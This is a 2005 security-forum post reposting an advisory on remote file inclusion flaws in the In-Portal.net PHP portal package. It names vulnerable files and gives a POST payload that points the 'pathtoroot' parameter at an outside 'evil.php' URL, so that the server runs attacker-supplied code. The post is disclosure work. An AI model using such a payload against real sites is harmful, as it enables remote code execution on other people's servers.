 |
|
 |
 |
Menu |
 |
|
 Home |
| |
|
 Discussions |
| |
|
 Tools |
| |
|
| Affiliates |
| |
|
 Content |
| |
|
 Info |
| | |
|
|
|
|
|
User Info |
|
 Membership:
 Latest: MichaelSnaRe
 New Today: 0
 New Yesterday: 0
 Overall: 9144
 People Online:
 Visitors: 42
 Members: 0
 Total: 42
|
|
|
|
|
|
Full disclosure |
|
|
|
 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
|
Multiple Vulnerability In-Portal.net |
|
 Posted: Thu Oct 13, 2005 2:24 pm |
 |
|
| g0df4th3r |
| Advanced user |
 |
|
| Joined: Sep 22, 2004 |
| Posts: 52 |
| Location: LV |
|
|
 |
|
 |
|
Multiple Vulnerability In-Portal.net
In-Portal Site Package - Price:$295
Quote: "our most popular products designed to run a successful portal or a community web site. It is equipped with the latest In-portal Platform, In-link (Directory Management), In-newz (News Management) and In-bulletin (Discussion Forum)" - in-portal.net
Credit: der4444 original advisory at hackers.by.lv
Vulnerable File:
/kernel/include/item.php
POST: pathtoroot=http://pridels.blogspot.com/evil.php?
In-Link is also vulnerable to a remote include in:
includes/init.php
BUT, php version >= 5.0 and registered globals on. Which is a rare configuration.
Greetz to New Angels team,waraxe,X-ACCESS crew
original advisory:
http://pridels.blogspot.com/2005/10/in-portalnet.html |
|
|
|
|
|
www.waraxe.us Forum Index -> Remote file inclusion
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|
|
